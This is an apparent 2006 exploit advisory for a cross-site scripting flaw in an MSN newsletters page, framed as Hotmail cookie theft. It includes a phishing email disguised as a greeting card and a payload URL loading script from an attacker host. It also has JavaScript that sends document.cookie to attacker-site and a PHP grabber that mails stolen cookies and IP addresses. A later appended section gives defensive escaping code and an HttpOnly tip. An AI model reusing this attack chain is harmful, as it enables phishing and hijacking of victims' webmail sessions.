
hotmailmsnxss.txt

Posted Aug 27, 2006
Authored by Simo64 | Site morx.org

Hotmail/MSN suffers from a cross site scripting flaw.

tags | exploit, xss
SHA-256 | eaf58befb3afdae98608b527db273927c909566c2b27744e053c32a41c4f9af1

Hotmail/MSN Cross Site Scripting Exploit

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for), Firefox 1.5 and Opera (should work on all browsers)

Morx Security Research Team
http://www.morx.org

Description:

Exploit written in PHP for the cross site scripting vulnerability in the 'RE'
variable of newsletters.msn.com/xs-v3/insite.asp on the MSN.com website. The
exploit requires the victim to open the email sent by the attacker and click on
a URL, so some social engineering skills are required too.


Exploitation:


Exploiting this vulnerability can be done by uploading the following script to
a PHP-enabled web server and then sending the victim an email containing
http://www.attacker-server.com/ecard.php, the link to the script that redirects
to the vulnerable MSN site. As an example, the email can be sent as a greeting
card with the following HTML code. You may also need to modify some things in
the ecard.php exploit to make it fit your needs.

Hello, </p>
Alias has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="http://attacker-site/ecard.php">http://lycos.americangreetings.com/view.pd?i=197484541&m=8381&rr=y&source=lycos</a> </p>
Or copy and paste the above link into your web browser's address window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
Thanks for using Lycos Greetings with AmericanGreetings.com




------------------------ Hotmail/MSN accounts XSS Xploit by Simo64 ----------------------

Exploit:

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>

where the redir.js code is:

location.href='http://attacker-site/a.php?cookie='+escape(document.cookie)

and a.php, as the cookie grabber, may use the following code:

<?
// Value of the "cookie" query parameter sent by redir.js
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

// Send the browser on to a real greeting card page
header("Location: http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");
?>


The ecard.php page may contain a simple PHP or JavaScript redirection to the
exploit link :)
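
The shape of the RE value suggests it is reflected inside a quoted JavaScript string in an inline script element. The following is an added example, not part of the original advisory and not MSN's code, comparing raw reflection, quote-only escaping and full \uXXXX escaping under that assumption; go() and the render function names are hypothetical.

```javascript
// Added example, not code from the advisory or from MSN.
// Assumption: the page reflects RE inside a single-quoted JavaScript string
// in an inline <script>; go() is a hypothetical function name.
const PAYLOAD = "')></script><script src=http://attacker/redir.js>"; // RE value quoted in the advisory

// Vulnerable form: the parameter is concatenated into the script block as-is.
function renderVulnerable(re) {
  return "<script>go('" + re + "')</script>";
}

// Incomplete fix: escaping only quotes keeps the JS string intact, but the HTML
// parser still ends the element at the first </script>, whatever the JS state.
function renderQuoteEscaped(re) {
  return "<script>go('" + re.replace(/[\\']/g, "\\$&") + "')</script>";
}

// Hardened form: everything outside a small allow-list becomes \uXXXX, so the
// output contains no quote, backslash, '<' or '>' supplied by the user.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderHardened(re) {
  return "<script>go('" + jsStringEscape(re) + "')</script>";
}

// Rough model of the HTML tokenizer: list every opening <script ...> tag.
function scriptTags(html) {
  return html.match(/<script\b[^>]*>/gi) || [];
}

// The escaped text must still decode to the original value (JSON shares \uXXXX).
function roundTrips(value) {
  return JSON.parse('"' + jsStringEscape(value) + '"') === value;
}

for (const render of [renderVulnerable, renderQuoteEscaped, renderHardened]) {
  console.log(render.name, scriptTags(render(PAYLOAD)));
}
console.log("round trip:", roundTrips(PAYLOAD));
```

Setting the HttpOnly attribute on the session cookie additionally keeps it out of document.cookie, which is what redir.js reads.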


Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be used/tested
on your OWN machine/account. I cannot be held responsible for any of the above.